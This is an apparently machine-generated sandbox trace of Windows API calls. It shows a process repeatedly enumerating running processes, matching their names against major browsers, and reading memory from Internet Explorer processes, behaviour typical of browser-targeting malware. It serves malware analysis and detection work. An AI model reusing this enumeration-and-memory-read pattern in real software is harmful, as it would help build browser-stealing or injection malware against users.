	[0245.690] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0245.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x9390
	[0245.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.691] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0245.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.692] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.692] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0245.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.693] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.693] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0245.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x9394
	[0245.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.694] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0245.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.694] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0245.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.695] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0245.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.695] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.695] NtQueryInformationProcess (in: ProcessHandle=0x9394, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0245.695] ReadProcessMemory (in: hProcess=0x9394, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0245.695] ReadProcessMemory (in: hProcess=0x9394, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0245.695] ReadProcessMemory (in: hProcess=0x9394, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0245.696] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0245.696] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0245.696] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x9398
	[0245.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.697] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0245.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.697] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0245.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.697] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0245.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.697] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.698] NtQueryInformationProcess (in: ProcessHandle=0x9398, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0245.698] ReadProcessMemory (in: hProcess=0x9398, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0245.698] ReadProcessMemory (in: hProcess=0x9398, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0245.698] ReadProcessMemory (in: hProcess=0x9398, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0245.698] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0245.698] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0245.699] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x939c
	[0245.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.699] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0245.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.699] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.700] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0245.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.700] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.700] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0245.701] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x93a0
	[0245.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.701] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0245.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.702] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.702] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0245.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.702] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.703] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.703] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x93a4
	[0245.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.703] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.704] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.704] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.704] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.705] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.705] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x93a8
	[0245.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.707] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.707] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.708] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.708] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.708] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x93ac
	[0245.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.709] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.710] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.710] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.710] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.711] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0245.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x93b0
	[0245.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.712] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0245.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.712] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.713] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0245.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.713] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.714] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x93b4
	[0245.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.715] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.716] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.716] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.717] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.717] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.765] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x93b8
	[0245.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.765] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.765] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.765] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.766] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.766] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0245.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x93bc
	[0245.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.767] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0245.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.767] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.767] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0245.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.768] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.768] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0245.769] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x93c0
	[0245.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.769] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.769] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.769] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.770] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.770] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0245.771] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x93c4
	[0245.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.771] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0245.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.771] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.771] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0245.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.772] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.772] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.772] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x93c8
	[0245.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.773] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.773] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.773] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.774] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.774] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0245.774] CloseHandle (hObject=0x4fd0) returned 1
	[0245.775] Sleep (dwMilliseconds=0x64) 
	[0245.873] GetCurrentProcessId () returned 0x110
	[0245.873] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0245.876] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0245.877] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0245.878] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0245.880] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x93cc
	[0245.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.880] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0245.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.880] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.881] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0245.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.882] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.882] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0245.883] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x93d0
	[0245.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.883] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0245.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.884] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.885] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0245.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.885] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.885] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0245.887] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x93d4
	[0245.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.887] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0245.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.887] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.889] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0245.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.889] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.889] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0245.890] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x93d8
	[0245.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.890] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0245.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.890] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.891] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0245.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.891] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.891] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0245.892] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x93dc
	[0245.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.892] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0245.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.892] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.893] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0245.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.893] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.893] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0245.894] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x93e0
	[0245.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.894] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0245.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.895] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.895] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0245.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.895] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.895] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0245.896] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x93e4
	[0245.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.896] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0245.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
